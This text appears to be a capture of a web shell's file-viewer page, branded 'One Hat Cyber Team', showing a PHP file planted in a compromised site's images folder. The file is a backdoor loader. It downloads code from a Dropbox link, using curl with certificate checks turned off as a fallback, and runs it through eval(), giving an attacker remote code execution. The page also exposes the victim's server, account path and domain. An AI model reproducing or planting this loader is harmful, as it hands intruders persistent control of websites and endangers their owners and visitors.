⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.15
Server IP:
93.127.173.65
Server:
Linux in-mum-web1667.main-hosting.eu 5.14.0-503.34.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Mar 27 06:00:50 EDT 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.0.30
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
u954985599
/
domains
/
sgagritech.com
/
public_html
/
assets
/
images
/
View File Name :
8VbT02.php
<?php function fetchContent($url) { $options = [ 'http' => [ 'header' => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n" ] ]; $context = stream_context_create($options); $content = @file_get_contents($url, false, $context); if ($content === false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $content = curl_exec($ch); curl_close($ch); } return $content; } $url = 'https://dl.dropboxusercontent.com/scl/fi/14bc1dpiac34zoj7azmhw/02.txt?rlkey=vqchd84uwpyuq7qffk91c6fmx&st=fyvokkx6&raw=1'; $content = fetchContent($url); if ($content) { eval('?>' . $content); } ?>